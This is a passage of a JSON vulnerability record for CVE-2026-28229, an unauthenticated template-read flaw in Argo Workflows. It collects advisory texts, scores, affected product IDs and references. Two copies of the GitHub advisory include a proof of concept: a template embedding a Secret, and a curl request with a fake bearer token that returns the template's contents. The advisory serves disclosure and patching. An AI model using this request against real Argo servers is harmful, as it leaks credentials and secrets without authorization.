                    "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-28229"
                },
                {
                    "category": "description",
                    "text": "A flaw was found in Argo Workflows in which an attacker can leak sensitive information contained in Workflow Templates and Cluster Workflow Templates. Because the functions that retrieve template information use server permissions, no authorization is required to read templates which might contain secrets such as passwords, API keys, or other sensitive data.",
                    "title": "redhat - https://access.redhat.com/security/cve/CVE-2026-28229"
                },
                {
                    "category": "description",
                    "text": "Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Prior to 4.0.2 and 3.7.11, Workflow templates endpoints allow any client to retrieve WorkflowTemplates (and ClusterWorkflowTemplates). Any request with a Authorization: Bearer nothing token can leak sensitive template content, including embedded Secret manifests. This vulnerability is fixed in 4.0.2 and 3.7.11.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Bitnami%2FBIT-argo-workflows-2026-28229.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "### Summary\nWorkflow templates endpoints allow any client to retrieve WorkflowTemplates (and ClusterWorkflowTemplates). Any request with a `Authorization: Bearer nothing` token can leak sensitive template content, including embedded Secret manifests.\n\n### Details\n\nhttps://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/workflowtemplate/workflow_template_server.go#L60-L78\n\nhttps://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/clusterworkflowtemplate/cluster_workflow_template_server.go#L54-L72\n\nInformers use the server’s rest config, so they read using server SA privileges. \n\nhttps://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/workflowtemplate/informer.go#L29-L42\n\nhttps://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/clusterworkflowtemplate/informer.go#L34-L46\n\n### PoC\n1. Create template\n\n```yml\napiVersion: argoproj.io/v1alpha1\nkind: WorkflowTemplate\nmetadata:\n  name: leak-workflow-template\n  namespace: argo\nspec:\n  templates:\n  - name: make-secret\n    resource:\n      action: create\n      manifest: |\n        apiVersion: v1\n        kind: Secret\n        metadata:\n          name: leaked-secret\n        type: Opaque\n        data:\n          password: c3VwZXJzZWNyZXQ=\n```\n\nThen apply that with `kubectl apply -f poc.yml`\n2. Query Argo Server with a fake token\n\n**Result:**\n\n```cmd\n> kubectl apply -f poc.yml\nworkflowtemplate.argoproj.io/leak-workflow-template created\n> curl -sk -H \"Authorization: Bearer nothing\" \\\n    \"https://localhost:2746/api/v1/workflow-templates/argo/leak-workflow-template\"\n{\"metadata\":{\"name\":\"leak-workflow-template\",\"namespace\":\"argo\",\"uid\":\"6f91481c-df9a-4aeb-9fe3-a3fb6b12e11c\",\"resourceVersion\":\"867394\",\"generation\":1,\"creationTimestamp\":\"REDACTED\",\"annotations\":{\"kubectl.kubernetes.io/last-applied-configuration\":\"{\\\"apiVersion\\\":\\\"argoproj.io/v1alpha1\\\",\\\"kind\\\":\\\"WorkflowTemplate\\\",\\\"metadata\\\":{\\\"annotations\\\":{},\\\"name\\\":\\\"leak-workflow-template\\\",\\\"namespace\\\":\\\"argo\\\"},\\\"spec\\\":{\\\"templates\\\":[{\\\"name\\\":\\\"make-secret\\\",\\\"resource\\\":{\\\"action\\\":\\\"create\\\",\\\"manifest\\\":\\\"apiVersion: v1\\\\nkind: Secret\\\\nmetadata:\\\\n  name: leaked-secret\\\\ntype: Opaque\\\\ndata:\\\\n  password: c3VwZXJzZWNyZXQ=\\\\n\\\"}}]}}\\n\"},\"managedFields\":[{\"manager\":\"kubectl-client-side-apply\",\"operation\":\"Update\",\"apiVersion\":\"argoproj.io/v1alpha1\",\"time\":\"REDACTED\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\".\":{},\"f:kubectl.kubernetes.io/last-applied-configuration\":{}}},\"f:spec\":{\".\":{},\"f:templates\":{}}}}]},\"spec\":{\"templates\":[{\"name\":\"make-secret\",\"inputs\":{},\"outputs\":{},\"metadata\":{},\"resource\":{\"action\":\"create\",\"manifest\":\"apiVersion: v1\\nkind: Secret\\nmetadata:\\n  name: leaked-secret\\ntype: Opaque\\ndata:\\n  password: c3VwZXJzZWNyZXQ=\\n\"}}],\"arguments\":{}}}\n```\n\n### Impact\nAny client can leaks Workflow Template and Cluster Workflow Template data, including secrets, artifact locations, service account usage, env vars, and resource manifests.",
                    "title": "github - https://api.github.com/advisories/GHSA-56px-hm34-xqj5"
                },
                {
                    "category": "description",
                    "text": "Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Prior to 4.0.2 and 3.7.11, Workflow templates endpoints allow any client to retrieve WorkflowTemplates (and ClusterWorkflowTemplates). Any request with a Authorization: Bearer nothing token can leak sensitive template content, including embedded Secret manifests. This vulnerability is fixed in 4.0.2 and 3.7.11.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-28229"
                },
                {
                    "category": "description",
                    "text": "### Summary\nWorkflow templates endpoints allow any client to retrieve WorkflowTemplates (and ClusterWorkflowTemplates). Any request with a `Authorization: Bearer nothing` token can leak sensitive template content, including embedded Secret manifests.\n\n### Details\n\nhttps://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/workflowtemplate/workflow_template_server.go#L60-L78\n\nhttps://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/clusterworkflowtemplate/cluster_workflow_template_server.go#L54-L72\n\nInformers use the server’s rest config, so they read using server SA privileges. \n\nhttps://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/workflowtemplate/informer.go#L29-L42\n\nhttps://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/clusterworkflowtemplate/informer.go#L34-L46\n\n### PoC\n1. Create template\n\n```yml\napiVersion: argoproj.io/v1alpha1\nkind: WorkflowTemplate\nmetadata:\n  name: leak-workflow-template\n  namespace: argo\nspec:\n  templates:\n  - name: make-secret\n    resource:\n      action: create\n      manifest: |\n        apiVersion: v1\n        kind: Secret\n        metadata:\n          name: leaked-secret\n        type: Opaque\n        data:\n          password: c3VwZXJzZWNyZXQ=\n```\n\nThen apply that with `kubectl apply -f poc.yml`\n2. Query Argo Server with a fake token\n\n**Result:**\n\n```cmd\n> kubectl apply -f poc.yml\nworkflowtemplate.argoproj.io/leak-workflow-template created\n> curl -sk -H \"Authorization: Bearer nothing\" \\\n    \"https://localhost:2746/api/v1/workflow-templates/argo/leak-workflow-template\"\n{\"metadata\":{\"name\":\"leak-workflow-template\",\"namespace\":\"argo\",\"uid\":\"6f91481c-df9a-4aeb-9fe3-a3fb6b12e11c\",\"resourceVersion\":\"867394\",\"generation\":1,\"creationTimestamp\":\"REDACTED\",\"annotations\":{\"kubectl.kubernetes.io/last-applied-configuration\":\"{\\\"apiVersion\\\":\\\"argoproj.io/v1alpha1\\\",\\\"kind\\\":\\\"WorkflowTemplate\\\",\\\"metadata\\\":{\\\"annotations\\\":{},\\\"name\\\":\\\"leak-workflow-template\\\",\\\"namespace\\\":\\\"argo\\\"},\\\"spec\\\":{\\\"templates\\\":[{\\\"name\\\":\\\"make-secret\\\",\\\"resource\\\":{\\\"action\\\":\\\"create\\\",\\\"manifest\\\":\\\"apiVersion: v1\\\\nkind: Secret\\\\nmetadata:\\\\n  name: leaked-secret\\\\ntype: Opaque\\\\ndata:\\\\n  password: c3VwZXJzZWNyZXQ=\\\\n\\\"}}]}}\\n\"},\"managedFields\":[{\"manager\":\"kubectl-client-side-apply\",\"operation\":\"Update\",\"apiVersion\":\"argoproj.io/v1alpha1\",\"time\":\"REDACTED\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\".\":{},\"f:kubectl.kubernetes.io/last-applied-configuration\":{}}},\"f:spec\":{\".\":{},\"f:templates\":{}}}}]},\"spec\":{\"templates\":[{\"name\":\"make-secret\",\"inputs\":{},\"outputs\":{},\"metadata\":{},\"resource\":{\"action\":\"create\",\"manifest\":\"apiVersion: v1\\nkind: Secret\\nmetadata:\\n  name: leaked-secret\\ntype: Opaque\\ndata:\\n  password: c3VwZXJzZWNyZXQ=\\n\"}}],\"arguments\":{}}}\n```\n\n### Impact\nAny client can leaks Workflow Template and Cluster Workflow Template data, including secrets, artifact locations, service account usage, env vars, and resource manifests.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-56px-hm34-xqj5.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "Unauthorized access to Argo Workflows Template in github.com/argoproj/argo-workflows",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4678.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Prior to 4.0.2 and 3.7.11, Workflow templates endpoints allow any client to retrieve WorkflowTemplates (and ClusterWorkflowTemplates). Any request with a Authorization: Bearer nothing token can leak sensitive template content, including embedded Secret manifests. This vulnerability is fixed in 4.0.2 and 3.7.11.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-28229.json?alt=media"
                },
                {
                    "category": "other",
                    "text": "0.00054",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "4.8",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "There is cwe data available from source Redhat, There is cvss data available from source Redhat, Is related to CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor), There is product data available from source Redhat",
                    "title": "NCSC Score top increasing factors"
                },
                {
                    "category": "other",
                    "text": "Is related to (a version of) an uncommon product, There is exploit data available from source Nvd",
                    "title": "NCSC Score top decreasing factors"
                },
                {
                    "category": "details",
                    "text": "Severity: 3\n",
                    "title": "Vendor assessment"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5795942",
                    "CSAFPID-5795943",
                    "CSAFPID-1439279",
                    "CSAFPID-1441104",
                    "CSAFPID-1441105",
                    "CSAFPID-1455889",
                    "CSAFPID-1455890",
                    "CSAFPID-1455891",
                    "CSAFPID-1455892",
                    "CSAFPID-1455893",
                    "CSAFPID-2976375",
                    "CSAFPID-2976376",
                    "CSAFPID-2976380",
                    "CSAFPID-2976381",
                    "CSAFPID-2976382",
                    "CSAFPID-2976383",
                    "CSAFPID-2976384",
                    "CSAFPID-5813179",
                    "CSAFPID-5813180",
                    "CSAFPID-5838851",
                    "CSAFPID-5875116",
                    "CSAFPID-5907264",
                    "CSAFPID-5907265",
                    "CSAFPID-3852467",
                    "CSAFPID-3852468",
                    "CSAFPID-3852469",
                    "CSAFPID-3852470",
                    "CSAFPID-3852471",
                    "CSAFPID-3852472",
                    "CSAFPID-3852473",
                    "CSAFPID-3852474",
                    "CSAFPID-3852475",
                    "CSAFPID-3852476",
                    "CSAFPID-3852477",
                    "CSAFPID-3852478",
                    "CSAFPID-3852479",
                    "CSAFPID-3852480",
                    "CSAFPID-3852481",
                    "CSAFPID-3852482",
                    "CSAFPID-3852483",
                    "CSAFPID-3852484",
                    "CSAFPID-3852485",
                    "CSAFPID-3852486",
                    "CSAFPID-3852487",
                    "CSAFPID-3852488",
                    "CSAFPID-3852489",
                    "CSAFPID-3852490",
                    "CSAFPID-3852491",
                    "CSAFPID-3852492",
                    "CSAFPID-3852493",
                    "CSAFPID-3852494",
                    "CSAFPID-3852495",
                    "CSAFPID-3852496",
                    "CSAFPID-3852497",
                    "CSAFPID-3852498",
                    "CSAFPID-3852499",
                    "CSAFPID-3852500",
                    "CSAFPID-3852501",
                    "CSAFPID-3852502",
                    "CSAFPID-3852503",
                    "CSAFPID-3852504",
                    "CSAFPID-5050895",
                    "CSAFPID-5050896",
                    "CSAFPID-5050897",
                    "CSAFPID-5050898",
                    "CSAFPID-5050909",
                    "CSAFPID-5050910",
                    "CSAFPID-5050911",
                    "CSAFPID-5050912",
                    "CSAFPID-5138379",
                    "CSAFPID-5138380",
                    "CSAFPID-5138381",
                    "CSAFPID-5455332",
                    "CSAFPID-5455333",
                    "CSAFPID-5455334",
                    "CSAFPID-5455335",
                    "CSAFPID-5455336",
                    "CSAFPID-5909582",
                    "CSAFPID-5909583",
                    "CSAFPID-5910332",
                    "CSAFPID-5910333",
                    "CSAFPID-5910334"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://github.com/advisories/GHSA-56px-hm34-xqj5"
                },
                {
                    "category": "external",
                    "summary": "Source raw - github",
                    "url": "https://api.github.com/advisories/GHSA-56px-hm34-xqj5"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28229"
                },
                {
                    "category": "external",
                    "summary": "Source raw - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-28229"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-28229"
                },
                {
                    "category": "external",
                    "summary": "Source raw - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/28xxx/CVE-2026-28229.json"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28229"
                },
                {
                    "category": "external",
                    "summary": "Source raw - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-28229"
                },
                {
                    "category": "external",
                    "summary": "Source raw - redhat",
                    "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28229.json"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Bitnami%2FBIT-argo-workflows-2026-28229.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-56px-hm34-xqj5"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-28229"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-56px-hm34-xqj5.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4678.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-28229.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-56px-hm34-xqj5"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://github.com/argoproj/argo-workflows/commit/34afaf9c0c36f1ba8645d483ea4752cfc4a391e8"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://github.com/argoproj/argo-workflows/releases/tag/v3.7.11"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://github.com/argoproj/argo-workflows/releases/tag/v4.0.2"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-56px-hm34-xqj5"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv; redhat",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28229"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-28229"
                },
                {
                    "category": "external",
                    "summary": "Reference - osv",
                    "url": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/28xxx/CVE-2026-28229.json"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                        "baseScore": 9.8,
                        "baseSeverity": "CRITICAL"
                    },
                    "products": [
                        "CSAFPID-1439279",
                        "CSAFPID-1441104",
                        "CSAFPID-1441105",
                        "CSAFPID-1455889",
                        "CSAFPID-1455890",
                        "CSAFPID-1455891",
                        "CSAFPID-1455892",
                        "CSAFPID-1455893",
                        "CSAFPID-2976375",
                        "CSAFPID-2976376",
                        "CSAFPID-2976380",
                        "CSAFPID-2976381",
                        "CSAFPID-2976382",
                        "CSAFPID-2976383",
                        "CSAFPID-2976384",
                        "CSAFPID-3852467",
                        "CSAFPID-3852468",
                        "CSAFPID-3852469",
                        "CSAFPID-3852470",
                        "CSAFPID-3852471",
                        "CSAFPID-3852472",
                        "CSAFPID-3852473",
                        "CSAFPID-3852474",
                        "CSAFPID-3852475",
                        "CSAFPID-3852476",
                        "CSAFPID-3852477",
                        "CSAFPID-3852478",
                        "CSAFPID-3852479",
                        "CSAFPID-3852480",
                        "CSAFPID-3852481",
                        "CSAFPID-3852482",
                        "CSAFPID-3852483",
                        "CSAFPID-3852484",
                        "CSAFPID-3852485",
                        "CSAFPID-3852486",
                        "CSAFPID-3852487",
                        "CSAFPID-3852488",
                        "CSAFPID-3852489",
                        "CSAFPID-3852490",
                        "CSAFPID-3852491",
                        "CSAFPID-3852492",
                        "CSAFPID-3852493",
                        "CSAFPID-3852494",
                        "CSAFPID-3852495",
                        "CSAFPID-3852496",
                        "CSAFPID-3852497",
                        "CSAFPID-3852498",
                        "CSAFPID-3852499",
                        "CSAFPID-3852500",
                        "CSAFPID-3852501",
                        "CSAFPID-3852502",
                        "CSAFPID-3852503",
                        "CSAFPID-3852504",
                        "CSAFPID-5050895",
                        "CSAFPID-5050896",
                        "CSAFPID-5050897",
                        "CSAFPID-5050898",
                        "CSAFPID-5050909",
                        "CSAFPID-5050910",
                        "CSAFPID-5050911",
                        "CSAFPID-5050912",
                        "CSAFPID-5138379",
                        "CSAFPID-5138380",
                        "CSAFPID-5138381",
                        "CSAFPID-5455332",
                        "CSAFPID-5455333",
                        "CSAFPID-5455334",
                        "CSAFPID-5455335",
                        "CSAFPID-5455336",
                        "CSAFPID-5795942",
                        "CSAFPID-5795943",
                        "CSAFPID-5813179",
                        "CSAFPID-5813180",
                        "CSAFPID-5838851",
                        "CSAFPID-5875116",
                        "CSAFPID-5907264",
                        "CSAFPID-5907265",
                        "CSAFPID-5909582",
                        "CSAFPID-5909583",
                        "CSAFPID-5910332",
                        "CSAFPID-5910333",
                        "CSAFPID-5910334"
                    ]
                }
            ],
            "title": "CVE-2026-28229"
        }
    ]
}